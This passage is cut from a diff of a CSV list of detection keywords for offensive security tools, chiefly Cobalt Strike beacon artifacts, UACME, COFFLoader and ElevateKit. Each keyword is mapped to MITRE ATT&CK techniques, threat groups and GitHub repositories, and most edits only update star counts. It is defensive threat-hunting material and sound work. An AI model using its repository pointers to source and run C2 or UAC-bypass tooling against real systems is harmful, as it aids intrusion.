- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*Beacon Payload Generator*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*beacon.*winsrv.dll*","offensive_tool_keyword","cobaltstrike","Cobalt 
Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*beacon.CommandBuilder*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" 
@@ -7639,11 +7785,11 @@ "*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_commands*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*beacon_compatibility.c*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" -"*beacon_compatibility.h*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_compatibility.c*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_compatibility.h*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_elevators*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
@@ -7652,23 +7798,23 @@ "*beacon_endpoint*c2Post*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*beacon_execute_job*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_exploit_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*beacon_exploit_register*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 